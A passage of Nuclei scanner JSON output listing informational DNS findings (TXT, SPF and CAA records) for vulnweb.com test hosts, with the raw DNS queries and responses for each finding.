Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 59013\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 59013\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.254694784Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 7466\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 7466\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.255012582Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 7466\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 7466\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.255058771Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 17834\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 17834\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.255648859Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 17834\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 17834\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.255697247Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 23079\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 23079\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.255844702Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 23079\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 23079\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.25588658Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 19184\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 19184\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.256526283Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 19184\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 19184\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.256582085Z\",\"matcher-status\":true}\n{\"template\":\"dns/spf-record-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/spf-record-detect\",\"template-id\":\"spf-record-detect\",\"template-path\":\"/home/rengine/nuclei-templates/dns/spf-record-detect.yaml\",\"info\":{\"name\":\"SPF Record - Detection\",\"author\":[\"rxerium\"],\"tags\":[\"dns\",\"spf\"],\"description\":\"An SPF TXT record was detected\\n\",\"reference\":[\"https://www.mimecast.com/content/how-to-create-an-spf-txt-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 62565\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 62565\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.258345693Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"extracted-results\":[\"\\\"v=spf1 -all\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 62565\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 62565\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntesthtml5.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:34.258424417Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"rest.vulnweb.com\",\"matched-at\":\"rest.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 17907\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 17907\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.278940535Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"rest.vulnweb.com\",\"matched-at\":\"rest.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 43181\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 43181\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.279143037Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"rest.vulnweb.com\",\"matched-at\":\"rest.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 61794\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 61794\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.280260389Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"rest.vulnweb.com\",\"matched-at\":\"rest.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 12679\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 12679\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.280461344Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"rest.vulnweb.com\",\"matched-at\":\"rest.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 61414\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 61414\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.280471774Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"rest.vulnweb.com\",\"matched-at\":\"rest.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 9522\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 9522\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;rest.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86400\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:34.282312508Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities 